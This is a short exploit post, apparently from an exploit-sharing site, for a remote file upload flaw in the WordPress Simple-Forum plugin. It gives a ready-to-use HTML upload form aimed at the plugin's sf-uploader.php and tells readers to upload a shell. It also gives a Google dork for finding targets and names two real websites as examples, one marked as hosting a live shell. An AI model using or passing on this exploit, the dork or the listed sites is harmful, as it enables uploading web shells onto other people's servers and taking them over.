facebook facebook twitter rss

WordPress Simple-Forum Plugin Remote File Upload Vulnerability

Author: X-Bruno , Published: 05-10-2014
############################################################################
# Title : WordPress Simple-Forum Plugin Remote File Upload Vulnerability

# Author : X-Bruno

# Date : 10/05/2014

# Facebook : http://www.facebook.com/Inj3ct.Bruno

# Email: agiadx338@yahoo.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/simple-forum/

# Tested on : Linux
############################################################################

=== > Exploit :

<form enctype="multipart/form-data"

action="localhost/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">

<input type="jpg" name="url" value="./" />

Please choose a file: <input name="uploadfile" type="file" />

<input type="submit" value="upload" />


------ > save this code as *.htm , html and open the file with browser

------> select shell from your computer and upload & Enjoy .



Shell Access ==== > http://localhost/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php


Examples :

1 - http://www.theultimatespaceship.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

2 - (Live shell) http://music4you.ie/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/help.php


#################################################################



# Greeting : Syria 3> , Palestine , DR.SHA6H , SRS TEAM , MadLeets #



#################################################################

Like us on Facebook :